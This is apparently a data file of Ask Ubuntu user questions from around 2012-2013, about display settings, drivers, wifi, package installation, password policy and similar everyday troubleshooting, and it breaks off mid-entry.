244044	prevent screen turning off when watching video in xbmc	in 12.04 , the screen never went to sleep while watching videos in xbmc . however after upgrading to 12.10 and changing no settings , it does . is there any way i can prevent the screen automatically turning off while playing a video in xbmc , without actually disabling the screen from turning off at other times ? ideally , is there a xbmc specific setting for this ? was this a feature of xbmc that is now somehow broken in 12.10 or has this changed due to some other non-xbmc change within ubuntu ?
244045	give ubuntu one synced folder permissions to a e-mail contact via desktop	you can share a folder with a person with a e-mail address via the one.ubuntu.com web interface , but all i can find is the `` publish '' option in ubuntu 12.10 i do n't want to publish the file just share it with a e-mail address . any insight ?
244047	installed ubuntu on another drive , got rid of the drive , and dual boot screen is still coming up	edit : i am not asking how to uninstall ubuntu . the drive it was installed on is now gone . i did not uninstall it before i pulled it out . on start up the dual boot screen is still showing up and asking me to pick between windows or ubuntu . a while ago i installed ubuntu on a separate hdd ( dual boot with windows 7 ) . recently i removed the drive from my computer to put in a different computer . how do i uninstall the rest of ubuntu ? it is still showing ubuntu as an option on the start up dual boot screen .
244048	hp 8510p notebok overheating with ubuntu	i 've recently instaled ubuntu 12.10 on my notebook and noticed that it starts overheating after a few minutes of simple usage having only for example a browser opened or reading a pdf so nothing procesor intentsive . i 've tried also with xubuntu desctop thinking that it would be more lightweight , but with no success . i have a core2duo intel porcesor and ati radeon 2600hd graphic card . i 've also tried to install the proprietary drivers for the graphic card but no success , when i install drivers and login the menu is gone in unity do i have any chanses to stop this overheating ... any hints ? i 'm pasting the sensors output : adapter : virtual device temp1 : +71.0°c ( crit = +105.0°c ) temp2 : +45.0°c ( crit = +105.0°c ) temp3 : +26.8°c ( crit = +105.0°c ) temp4 : +75.0°c ( crit = +110.0°c ) temp5 : +55.0°c ( crit = +256.0°c ) temp6 : +45.0°c ( crit = +105.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +49.0°c ( high = +100.0°c , crit = +100.0°c ) core 1 : +47.0°c ( high = +100.0°c , crit = +100.0°c ) radeon-pci-0100 adapter : pci adapter temp1 : +51.0°c the temp1 and temp4 are problematic , temp4 sometimes goes as far as 100 % anyway how can i find out what temp1 and tem4 are refered to ? is that a graphic card chip or something else ? just hit the 100°c acpitz-virtual-0 adapter : virtual device temp1 : +75.0°c ( crit = +105.0°c ) temp2 : +46.0°c ( crit = +105.0°c ) temp3 : +27.0°c ( crit = +105.0°c ) temp4 : +100.0°c ( crit = +110.0°c ) temp5 : +55.0°c ( crit = +256.0°c ) temp6 : +45.0°c ( crit = +105.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +49.0°c ( high = +100.0°c , crit = +100.0°c ) core 1 : +47.0°c ( high = +100.0°c , crit = +100.0°c ) radeon-pci-0100 adapter : pci adapter temp1 : +56.0°c aditional info : the fan is working on 100 % when overheating occures i 've installed also win7 on the same notebook and there the problem is not occuring the cpu is 99 % idle when overheating occures so it is not the cpu i 've also updatet the bios to the latest image but does not help
244050	how do i get gpac v0.5.0 on 12.04 where v0.4.6 is in the repositories ?	i am currently working on a web application which requires streaming video , i am using an ec2 instance on aws with ubuntu 12.04 lts running on it . as i need to transcode video i am wishing to install gpac 0.5.0 package , however apt-get install gpac installs version 0.4.6 where some functionality does not work due to segmentation faults . on my own desktop running ubuntu 12.10 i can properly install 0.5.0 using same commands and properly transcode my video . basically my question is can i expect a gpac 0.5.0 package to be released for ubuntu on 12.04 lts or is there a workaround to get the newer version other then using the source ( which is breaking apparently due to mozzila updating parts of there library which the package relies on ) . any help or insight would be greatly appreciated .
244051	why does my virtualbox vm take so long to install windows 7 updates ?	i have a windows 7 vm running in virtualbox , on ubuntu 12.10 . i have a couple of problems that i 'm thinking might be related , but i have no idea how to figure out the root problem . whenever it installs updates , it takes forever to install and power down i have tried to install drivers ( from those included in windows ) on a couple of devices , and the operation has timed out . any pointers or suggestions on how to figure out what 's wrong would be great !
244053	how do i install ubuntu with some broken keys on the keyboard ?	i 'm attempting to install ubuntu 12.10 onto my older laptop . i power up the computer , pressing f12 to load the boot menu . it offers me to load from the hard drive and from my usb , but my â and tab both do n't work at that point ( hardware issue ) . what would be a workaround for me in this situation ? is there a way i can change the functions called on the keys for example ?
244060	when i open terminal it says command alias not found and closes	i was messing around in terminal ( bad idea , i know , but i 'm usually pretty good with it ) and now it does what the title says . i know about pressing control-c to stop it from running , but how do i just stop it running the command without pressing ctrl-c ?
244061	why does sshpass not work on arm ?	i am trying to use the sshpass command to automate installation of software on remote systems . it was installed using sudo apt-get install sshpass trying on my pc , using sshpass -e to provide a non-interactive password to the ssh command , this seems to work fine : $ sshpass=mypwd sshpass -e ssh -l myuser myhost on the arm based system , running ubuntu 11.10 , this command get stuck whenever i try to run ssh . note that it works just fine for `` simple '' commands like echo and even ping . is there a known problem with sshpass on arm ( specifically , w/ 11.10 ) ?
244079	how can i specify the languages that apt-get uses ?	at some point in my installation , i must 've selected several languages as default . when i run sudo apt-get update , i got output similar to the following . ign http : //ppa.launchpad.net quantal/main translation-en_nz ign http : //ppa.launchpad.net quantal/main translation-en_gb ign http : //ppa.launchpad.net quantal/main translation-en_ca ign http : //ppa.launchpad.net quantal/main translation-en_au ign http : //ppa.launchpad.net quantal/main translation-en i want to make apt-get only search for en_au , en_gb and en . i.e . i want to remove en_nz and en_ca . when i run locale , i indeed get the output language=en_au : en_nz : en_gb : en_ca : en . i modified my ~/.profile to change export language= '' en_au : en_nz : en_gb : en_ca : en '' to export language= '' en_au : en_gb : en '' then rebooted . now , locale shows only the three languages as expected , but when i run sudo apt-get update , i still see en_ca being searched for . oddly enough , i get the following output too . $ apt-config dump | grep lang acquire : :languages `` '' ; acquire : :languages : : `` en_au '' ; acquire : :languages : : `` en '' ; acquire : :languages : : `` en_gb '' ; acquire : :languages : : `` none '' ; acquire : :languages : : `` en_ca '' ; so it seems that apt-get is looking elsewhere for the en_ca entry . the problem is that i can not find where this could be . i do n't quite understand the man page of apt-config , but $ apt_config is empty , /etc/apt/ does n't contain a file named apt.conf , nor do i get anything recursively grepping this directory for en_ca . so my question isâś how can i make apt-get forget about en_ca ?
244080	no ubuntu option at boot screen	installed ubuntu using the windows installer , rebooted when it was finished and did not get the option to select it at the boot screen . dell latitude d630 win xp .
244081	disabling bash history index in terminal	when i ssh into somewhere , i see something line this in the terminal : [ 504 ] % looking it up , looks like its my bash shell history . how can i disable this index display and show the current working directory instead ?
244083	update manager shows errors and software center can only be opened through terminal with some errors in terminal	whenever i open update manager it shows the following error : and when i click on software-center it just shows starting software-center but then it goes back again . and if i try to open it using terminal , it shows the following error when it opens : 2013-01-17 04:01:02,165 - softwarecenter.backend.scagent - warning - error in query_info 'operation not supported ' 2013-01-17 04:01:02,166 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/share/software-center/softwarecenter/db/update.py ' , 369 , '_error_cb ' ) ' 2013-01-17 04:01:02,166 - root - warning - error : operation not supported 2013-01-17 04:01:02,311 - softwarecenter.app - info - software-center-agent finished with status 1 and when i click on check for updates the following errors comes up : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/maverick/main/source/sources.gz 404 not found failed to fetch http : //security.ubuntu.com/ubuntu/dists/maverick-security/restricted/binary-i386/packages.gz 404 not found [ ip : 91.189.92.200 80 ] failed to fetch http : //extras.ubuntu.com/ubuntu/dists/maverick/main/binary-i386/packages.gz 404 not found failed to fetch http : //security.ubuntu.com/ubuntu/dists/maverick-security/main/binary-i386/packages.gz 404 not found [ ip : 91.189.92.200 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/dists/maverick-security/multiverse/binary-i386/packages.gz 404 not found [ ip : 91.189.92.200 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/dists/maverick-security/universe/binary-i386/packages.gz 404 not found [ ip : 91.189.92.200 80 ] failed to fetch http : //ppa.launchpad.net/lkjoel/fix404/ubuntu/dists/maverick/main/source/sources.gz 404 not found failed to fetch http : //ppa.launchpad.net/lkjoel/fix404/ubuntu/dists/maverick/main/binary-i386/packages.gz 404 not found failed to fetch http : //ppa.launchpad.net/tucan/unstable/ubuntu/dists/maverick/main/source/sources.gz 404 not found failed to fetch http : //ppa.launchpad.net/tucan/unstable/ubuntu/dists/maverick/main/binary-i386/packages.gz 404 not found failed to fetch http : //old-releases.ubuntu.com/ubuntu-updates/dists/maverick/main/binary-i386/packages.gz 404 not found failed to fetch http : //old-releases.ubuntu.com/ubuntu-updates/dists/maverick/restricted/binary-i386/packages.gz 404 not found failed to fetch http : //old-releases.ubuntu.com/ubuntu-updates/dists/maverick/universe/binary-i386/packages.gz 404 not found failed to fetch http : //old-releases.ubuntu.com/ubuntu-updates/dists/maverick/multiverse/binary-i386/packages.gz 404 not found some index files failed to download , they have been ignored , or old ones used instead .
244084	why does xsensors produce only one value ?	i 'm using ubuntu 12.04 . now up until minutes ago xsensors was working fine . i had to restart due to some updates and it stopped working . by that i mean that it only displays one temperature ( the other tab is just blank ) : here is my the output from $ sensors , to show that there is other data being detected : k10temp-pci-00c3 adapter : pci adapter temp1 : +27.2°c ( high = +70.0°c ) ( crit = +90.0°c , hyst = +87.0°c ) fam15h_power-pci-00c4 adapter : pci adapter power1 : 115.97 w ( crit = 124.77 w ) it8720-isa-0228 adapter : isa adapter in0 : +1.41 v ( min = +0.00 v , max = +4.08 v ) in1 : +1.47 v ( min = +0.00 v , max = +4.08 v ) in2 : +3.38 v ( min = +0.00 v , max = +4.08 v ) +5v : +2.94 v ( min = +0.00 v , max = +4.08 v ) in4 : +3.06 v ( min = +0.00 v , max = +4.08 v ) in5 : +2.91 v ( min = +0.00 v , max = +4.08 v ) in6 : +4.08 v ( min = +0.00 v , max = +4.08 v ) alarm 5vsb : +2.96 v ( min = +0.00 v , max = +4.08 v ) vbat : +3.17 v fan1 : 2136 rpm ( min = 0 rpm ) fan2 : 724 rpm ( min = 0 rpm ) fan3 : 1318 rpm ( min = 0 rpm ) fan4 : 1094 rpm ( min = 0 rpm ) temp1 : +34.0°c ( low = +127.0°c , high = +127.0°c ) sensor = thermistor temp2 : +42.0°c ( low = +127.0°c , high = +127.0°c ) sensor = thermal diode temp3 : +39.0°c ( low = +127.0°c , high = +127.0°c ) sensor = thermal diode cpu0_vid : +0.000 v intrusion0 : alarm` any ideas ?
244091	do i need backup when there is ubuntu one ?	i am finding the information confusing . deja dup backup is running but delivering error messages about not enough storage space . there are only 2.6 gb of files in ubuntu one and the limit is 5 gb . deja dup has been an annoying software which turns itself on more often than scheduled and keeps trying unsuccessfully to create a first backup - more error messages . i do n't know what is in the ubuntu one files or how they got there . can anyone help without using patronising linux speak please ? i understand plain english best .
244097	how to install dcop ?	i tried to run dcop , since my yakuake can not be shown again in my cinnamon , and i do n't want to restart my yakuake . i found that this command can make my yakuake show again : dcop yakuake dcopinterface slottogglestate but i got no luck running it : $ dcop no command 'dcop ' found , did you mean : command 'dtop ' from package 'diod ' ( universe ) command 'dccp ' from package 'dcap ' ( universe ) command 'bcop ' from package 'compiz-fusion-bcop ' ( universe ) dcop : command not found i 've tried to search it , but no luck : $ apt-cache search dcop courier-filter-perl - purely perl-based mail filter framework for the courier mta gambas3 - complete visual development environment for gambas grace - xy graphing and plotting tool jless - a file pager program , similar to more ( 1 ) supporting iso2022 konversation - user friendly internet relay chat ( irc ) client for kde xgraph - plotting program , reads stdin , allows interactive zooming so , in which package dcop application is contained ?
244098	ta880gb+ motherboard with realtek alc892 = no sound	my htpc has the biostar ta880gb+ motherboard installed . i 'm using the hdmi port and for the life of me i can not get sound to work at all.. i am using the onboard realtek alc892 6-channel blu-ray audio . if anyone has a solution please help ! i 'd love to get off windows 7 and keep using ubuntu 12.10 thanks in advance !
244100	how to make unity launcher apps not bundle together when you have lots of them or to speed up the bar when scrolling down to apps ?	i notice that the applications do n't stay straight when you add more on . is there a way to fix this ? can you also speed up the scrolling speed when on the unity launcher ?
244102	ubuntu 12.04 failed mysql installation	i have deployed ubuntu 12.04 on the amazon cloud and i am trying to install nagios and nconf , while following this guide . when i install the prerequisites , i get this error on installing mysql : mmon_5.5.24-0ubuntu0.12.04.1_all.deb 404 not found [ ip : 91.189.92.200 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/m/mysql- 5.5/libmysqlclient18_5.5.24-0ubuntu0.12.04.1_amd64.deb 404 not found [ ip : 91.189.92.200 80 ] 404 not found [ ip : 91.189.92.200 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? ubuntu @ ip-10-244-18-255 : ~ $ ^c ubuntu @ ip-10-244-18-255 : ~ $ security.ubuntu.com as i am new to ubuntu , can someone please give me an advice what am i doing wrong here ? many thanks , vancho .
244103	byobu : open different tabs in different windows of the same session	let 's say i have a byobu session running with multiple tabs open . then if i open a new terminal , and start byobu , it will take me into the same session . if i then switch byobu tabs in one terminal , the other terminal will also switch to the same tab . is it possible to have different tabs of the same byobu session open in different terminals ?
244115	how to enforce company password complexity in 10.04 ?	i need to configure a ubuntu 10.04 server to follow a strict company password policy that specifies the following : at least one upper case at least one lower case at least one digit at least one special character i 've had a look around and all i have found is the instructions for specifying the password length , but i have yet to find something that relates to specifying the content of the password regarding the above points . any help would be appreciated .
244116	is there other program to make ubuntu apps besides quickly ?	and in some other programming language maybe ? i was wondering if i can create an app in some other program not quickly and post in in the ubuntu store ?
244119	what is use of /proc/pid/cpuset	in proc filesystem , what is use of /proc/pid/cpuset . i tried to open this file in each of the process id directories inside the /proc folder . cat /proc/2882/cpuset / can some one help me to understand what is the use of this file . thanks , vivek
244123	how to enable 3d acceleration with nvidia gt 555m ?	i have a dell xps 17 ( 3d ) laptop that comes with nvidia gt 555m . i installed ubuntu 12.04 lts on my laptop ( not side-by-side to windows , but as an application inside windows using wubi ) . i installed and activated the nvidia driver ( recommended ) in additional drivers . this went fine and the driver is activated . the problem is , i 'm unable to use 3d acceleration . 3d desktop effects do n't work . please , let me know how to enable 3d desktop effects/3d acceleration .
244130	can i uninstall a previous release and then reinstall a newer release using wubi ?	i have ubuntu 10.10 maverick meerkat on my dual-boot laptop right now . however , i want to use the 12.04 lts release instead . since i used wubi , is it possible to uninstall ubuntu 10.10 from windows and the install 12.04 from windows again ? that is assuming nothing goes wrong with windows when i uninstall 10.10 !
244133	how do i get egl and opengles libraries for ubuntu running on virtualbox ?	i have ubuntu running on virtualbox . guest additions are installed and now the os is hardware acceleration capable . i have opengl library in place . now i want to run apps using egl + opengles1.1 & 2.0 . how do i get them on ubuntu ? are there any open-source libraries available ? the libraries should use the virtualbox-provided hardware acceleration capabilities .
244134	not entering a password for a graphical root action	i have edited my /etc/sudoers to successfully stop myself from having to enter a password for sudo , but i still have to enter a password to do gui-based things like opening synaptic or clicking unlock in the user accounts app . interestingly , i do n't need a password to run gksudo synaptic . is there any way to not enter a password for graphical root actions ?
244140	how to contribute ubuntu mobile os ?	i am sad al abdullah from bangladesh . i complete my graduation from buet ( bangladesh university of technology and engineering ) on computer science and engineer . i 'd love to contribute ubuntu mobile os . is there any open source project ? would you please give some information how can i contribute ubuntu mobile os ?
244141	ubuntu 12.x usb printer `` stopped - waiting for printer to become available . ''	my wife was consistently having issues printing to her epson sylus photo r200 usb printer on ubuntu 12.04.1 lts . noted the error in the printer properties printing state : stopped - waiting for printer to become available . this had been happening for weeks to where she had taken to going to the library to print things before bringing it to my attention . her computer is basically on all the time , but the printer gets powered off & on as needed , and is shared between two computers . i found one innocuous resolution reference for a similar issue on ubuntu 11.x . wait until both ubuntu and the printer are fully powered on and booted ( post-post ) , and then re-/connect the usb cable . this solved the issue . i have seen numerous references to folks stating that swapping out a new usb cable or changing usb ports `` fixes '' this issue . it is likely that all these problems are simply due to cups ( or some linux printing sub-system ) getting locked up on the usb device being not ready , and then never polling again . fwiw : her workstation is pretty old -- p4 w/2gb & usually dug ~1gb into swap ( not actively swapping ) . do n't know if that matters in this particular case . thought it would be worth reporting as it seems like such a trivial fix for something affecting so many folks . is this the only fix or is there another way to fix this issue ?
244142	how to restart upgrade during middle of upgrade session	i was upgrading from ubuntu 11.10 to 12.04 sudo do-release-upgrade after this downloaded 700 mb of packages in approximately 10 hours and upgrade etc started i am finally stuck up here during the upgrade process system has stopped with following message setting up ubuntu-wallpapers ( 0.34.1 ) ... setting up adium-theme-ubuntu ( 0.3.2-0ubuntu1 ) ... setting up update-manager-core ( 1:0.156.14 ) ... installing new version of config file /etc/update-manager/release-upgrades ... setting up update-notifier-common ( 0.119ubuntu8.1 ) ... ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/andale32.exe ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/arial32.exe ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/arialb32.exe ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/comic32.exe ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/courie32.exe ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/georgi32.exe ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/impact32.exe ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/times32.exe ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/trebuc32.exe if you notice probably in the last line where it mentions ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/trebuc32.exe this is where it has hanged it either is unable to retrive the file or some thing happened here is there a way to get past this and proceed with upgrade ?
244147	how to display password policy information for a user ?	ubuntu documentation > ubuntu 9.04 > ubuntu server guide > security > user management states that there is a default minimum password length for ubuntu : by default , ubuntu requires a minimum password length of 4 characters say the password is to be modified by the user using passwd . is there a command for displaying the current password policies for a user ( such as the chage command displays the password expiration information for a specific user ) ? > sudo chage -l someusername last password change : may 13 , 2010 password expires : never password inactive : never account expires : never minimum number of days between password change : 0 maximum number of days between password change : 99999 number of days of warning before password expires : 7 this is rather than examining various places that control the policy and interpreting them since the process could contain errors . a command that reports the composed policy would be used to check the policy setting steps . this question , how to display password policy information for a user ( ubuntu ) ? , was posted on superuser but the request for it to be migrated to here was refused .
244152	wired lan works for 5 min and then stop working	internet ( wired ) works fine in windows but in ubuntu 12.10 it stop working after 5 min of starting ubuntu although connection does not disconnect it shows connected even if its not working . my laptop model is lenovo ideapad z560 . sai @ ubuntu : ~ $ ifconfig eth0 eth0 link encap : ethernet hwaddr 88 : ae:1d:39:88:40 inet addr:172.17.3.252 bcast:172.17.15.255 mask:255.255.240.0 inet6 addr : fe80 : :8aae:1dff : fe39:8840/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:11179 errors:0 dropped:0 overruns:0 frame:0 tx packets:137 errors:0 dropped:47 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:952745 ( 952.7 kb ) tx bytes:21060 ( 21.0 kb ) relevant lscpi -nnk output : 06:00.0 network controller [ 0280 ] : atheros communications inc. ar9285 wireless network adapter ( pci-express ) [ 168c:002b ] ( rev 01 ) subsystem : lenovo device [ 17aa:30a1 ] kernel driver in use : ath9k kernel modules : ath9k 07:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 02 ) subsystem : lenovo device [ 17aa:392e ] kernel driver in use : r8169 kernel modules : r8169
244154	linux : how do i get my thinkpad l530 trackpoint to work ?	i 've installed ubuntu on my thinkpad l530 and everything 's running pretty smooth except for the trackpoint ( that red button in between the keys for moving your pointer ) as well as the corresponding left/right mouse buttons below the spacebar . i only find solutions to fix scrolling , which did n't work but that 's not addressing the problem anyway . has anyone found a way to use the trackpoint and buttons in ubuntu 12.10 ?
244155	how to copy symbolic links while preserving the validity of the link ?	say under directory /usr/local/boost_1_52_0/stage/lib , i have a symbolic link : libboost_timer.so , which points to the regular file libboost_timer.so.1.52.0 in the same directory . how can i cp the symbolic links to directory /usr/local/lib while pointing to the same file /usr/local/boost_1_52_0/stage/lib/libboost_timer.so.1.52.0 . i have searched and tried several options . first one copies the regular file to the destination directory using the name of the link . second one just copies the link itself , but the link is not valid in the new directory . third one makes new link points to the original link , so it would de-reference twice to get the regular file . and i want to use the link file name , so directly making the links of the regular file would not work . how can i do this ?
244159	monitor resolution problem ( nouveau-driver , 32-bit ubuntu 12.04.1 )	all of a sudden the system changed the screen resolution to 1240x768 . i have an aoc 931 swl with optimal resolution : 1366x768 ( 60 hz ) . outputs : xrandr screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 4096 x 4096 vga-1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0* 800x600 60.3 56.2 848x480 60.0 640x480 59.9 and sudo lshw -c video *-display description : vga compatible controller product : c61 [ geforce 7025 / nforce 630a ] vendor : nvidia corporation physical id : d bus info : pci @ 0000:00:0d.0 version : a2 width : 64 bits clock : 66mhz capabilities : pm msi vga_controller bus_master cap_list rom configuration : driver=nouveau latency=0 did then cvt 1366x768 60 # 1368x60 50.19 hz ( cvt ) hsync : 3.81 khz ; pclk : 6.50 mhz modeline `` 1368x60_60.00 '' 6.50 1368 1408 1536 1704 60 63 73 76 -hsync +vsync // i wonder why modeline shows ... x60 instead of ... x768 ? i tried to apply this using xrandr -- newmode `` 1368x60_60.00 '' 6.50 1368 1408 1536 1704 60 63 73 76 -hsync +vsync //ok , no error msg xrandr -- addmode vga-1 1366x768 // msg : xrandr : can not find mode `` 1368x768 '' does somebody have an idea , how i can ( re ) set to right resolution ?
244165	ca n't connect to wifi after software update on ubuntu 12.10 . additional drivers says it is working . bcm4312	i 'm new to linux and just installed ubuntu last night as a dual boot with windows 7 . when i first installed it using usb the wifi worked . then i figured out how to use the software updater and updated it , downloading about 200 mb of updates . then the wifi stopped working . for the record , i 've seen numerous threads about this same topic and have tried basically everything they have said to try . finally a little while ago my wifi indicator/switch on my laptop is on after one of the codes i put in terminal , but still no wifi connection showing up . additional drivers says the driver is working though . one odd thing was , when i tried installing the kernels and such in terminal that other people were saying worked , it kept saying can not find installer or whatever on e : / to install it , but that 's my cd-rom drive and i used usb to install . so i 'm wondering if its looking in the wrong place for the firmware ? my laptop is a hp pavilion and this is my result of lspci -nn : 00:00.0 host bridge [ 0600 ] : intel corporation mobile 4 series chipset memory controller hub [ 8086:2a40 ] ( rev 07 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation mobile 4 series chipset integrated graphics controller [ 8086:2a42 ] ( rev 07 ) 00:02.1 display controller [ 0380 ] : intel corporation mobile 4 series chipset integrated graphics controller [ 8086:2a43 ] ( rev 07 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 [ 8086:2937 ] ( rev 03 ) 00:1a.1 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 [ 8086:2938 ] ( rev 03 ) 00:1a.7 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 [ 8086:293c ] ( rev 03 ) 00:1b.0 audio device [ 0403 ] : intel corporation 82801i ( ich9 family ) hd audio controller [ 8086:293e ] ( rev 03 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 82801i ( ich9 family ) pci express port 1 [ 8086:2940 ] ( rev 03 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 82801i ( ich9 family ) pci express port 2 [ 8086:2942 ] ( rev 03 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation 82801i ( ich9 family ) pci express port 3 [ 8086:2944 ] ( rev 03 ) 00:1c.3 pci bridge [ 0604 ] : intel corporation 82801i ( ich9 family ) pci express port 4 [ 8086:2946 ] ( rev 03 ) 00:1c.4 pci bridge [ 0604 ] : intel corporation 82801i ( ich9 family ) pci express port 5 [ 8086:2948 ] ( rev 03 ) 00:1c.5 pci bridge [ 0604 ] : intel corporation 82801i ( ich9 family ) pci express port 6 [ 8086:294a ] ( rev 03 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 [ 8086:2934 ] ( rev 03 ) 00:1d.1 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 [ 8086:2935 ] ( rev 03 ) 00:1d.2 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 [ 8086:2936 ] ( rev 03 ) 00:1d.3 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 [ 8086:2939 ] ( rev 03 ) 00:1d.7 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 [ 8086:293a ] ( rev 03 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev 93 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation ich9m lpc interface controller [ 8086:2919 ] ( rev 03 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 4 port sata controller [ ahci mode ] [ 8086:2929 ] ( rev 03 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 82801i ( ich9 family ) smbus controller [ 8086:2930 ] ( rev 03 ) 00:1f.6 signal processing controller [ 1180 ] : intel corporation 82801i ( ich9 family ) thermal subsystem [ 8086:2932 ] ( rev 03 ) 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 02 )
244168	cinnamon , stuck with 'old style ' menu	i tried installing nvidia drivers , but that did n't work , so i reverted to the nouveau ones . everything is almost back to normal except my cinnamon menu is looking strange ( and i ca n't do things like open the menu with the 'windows ' key ) . what i have : what i had before , and what i want : opening up cinnamon settings and changing the theme does nothing , i 've also tried sudo apt-get install -- reinstall cinnamon to no avail . any help would be greatly appreciated . i 'm running linux mint , so i was unsure whether to post this in ask ubuntu or the general unix stackexchange . i ended up posting here because i do n't have enough reputation in the unix stackexchange to post pictures .
244173	how to install apps when apt says `` could not perform immediate configuration '' ?	my problem is , when i want to install apps like apt-get install < appsname > , i get an error : root @ bt : / # apt-get install bluefish reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : adduser apt apt-utils aspell aspell-en base-files base-passwd busybox-initramfs ca-certificates consolekit coreutils cpio cpp cpp-4.4 dbus dbus-x11 debconf debconf-i18n debianutils defoma dictionaries-common dmsetup dosfstools dpkg e2fslibs e2fsprogs esound-clients esound-common file findutils fontconfig fontconfig-config fuse-utils gamin gawk gcc-4.4-base gconf2 gconf2-common ghostscript gnome-keyring gnome-mime-data gnupg gnupg-curl gpgv gsfonts gvfs gvfs-backends hdparm hicolor-icon-theme ifupdown indicator-application initramfs-tools initramfs-tools-bin initscripts insserv klibc-utils libacl1 libappindicator0 libarchive1 libart-2.0-2 libasound2 libaspell15 libatasmart4 libatk1.0-0 libatk1.0-data libattr1 libaudiofile0 libavahi-client3 libavahi-common-data libavahi-common3 libavahi-glib1 libblkid1 libbluetooth3 libbonobo2-0 libbonobo2-common libbonoboui2-0 libbonoboui2-common libbz2-1.0 libc-bin libc6 libc6-i686 libcairo2 libcap2 libcdio-cdda0 libcdio-paranoia0 libcdio10 libck-connector0 libcomerr2 libcups2 libcupsimage2 libcurl3-gnutls libdatrie1 libdb4.8 libdbus-1-3 libdbus-glib-1-2 libdbusmenu-glib1 libdbusmenu-gtk1 libdevmapper1.02.1 libdirectfb-1.2-0 libdrm-intel1 libdrm-nouveau1 libdrm-radeon1 libdrm2 libeggdbus-1-0 libesd0 libexif12 libexpat1 libffi5 libfontconfig1 libfontenc1 libfreetype6 libfribidi0 libfuse2 libgail18 libgamin0 libgcc1 libgconf2-4 libgcr0 libgcrypt11 libgdbm3 libgdu0 libglade2-0 libglib2.0-0 libglib2.0-data libgmp3c2 libgnome-keyring0 libgnome2-0 libgnome2-common libgnomecanvas2-0 libgnomecanvas2-common libgnomeui-0 libgnomeui-common libgnomevfs2-0 libgnomevfs2-common libgnutls26 libgomp1 libgp11-0 libgpg-error0 libgphoto2-2 libgphoto2-port0 libgpm2 libgs8 libgssapi-krb5-2 libgtk2.0-0 libgtk2.0-bin libgtk2.0-common libgudev-1.0-0 libgvfscommon0 libhal-storage1 libhal1 libice6 libidl0 libidn11 libimobiledevice0 libindicator0 libjasper1 libjpeg62 libjson-glib-1.0-0 libk5crypto3 libkeyutils1 libklibc libkrb5-3 libkrb5support0 liblcms1 libldap-2.4-2 liblocale-gettext-perl libltdl7 liblzma1 libmagic1 libmagickcore2 libmagickwand2 libmpfr1ldbl libncurses5 libncursesw5 libnewt0.52 libnih-dbus1 libnih1 libntfs-3g75 libntfs10 libopenobex1 liborbit2 libpam-ck-connector libpam-gnome-keyring libpam-modules libpam-runtime libpam0g libpango1.0-0 libpango1.0-common libpaper-utils libpaper1 libparted0debian1 libpcre3 libpixman-1-0 libplist1 libplymouth2 libpng12-0 libpolkit-agent-1-0 libpolkit-backend-1-0 libpolkit-gobject-1-0 libpopt0 libproxy0 libpython2.6 libreadline6 libsasl2-2 libsasl2-modules libselinux1 libsepol1 libsgutils2-2 libslang2 libsm6 libsmbclient libsoup-gnome2.4-1 libsoup2.4-1 libsqlite3-0 libss2 libssl0.9.8 libstdc++6 libsysfs2 libtalloc2 libtasn1-3 libtext-charwidth-perl libtext-iconv-perl libtext-wrapi18n-perl libthai-data libthai0 libtiff4 libts-0.0-0 libudev0 libusb-0.1-4 libusb-1.0-0 libusbmuxd1 libuuid1 libwbclient0 libx11-6 libx11-data libxau6 libxcb-render-util0 libxcb-render0 libxcb1 libxcomposite1 libxcursor1 libxdamage1 libxdmcp6 libxext6 libxfixes3 libxfont1 libxft2 libxi6 libxinerama1 libxml2 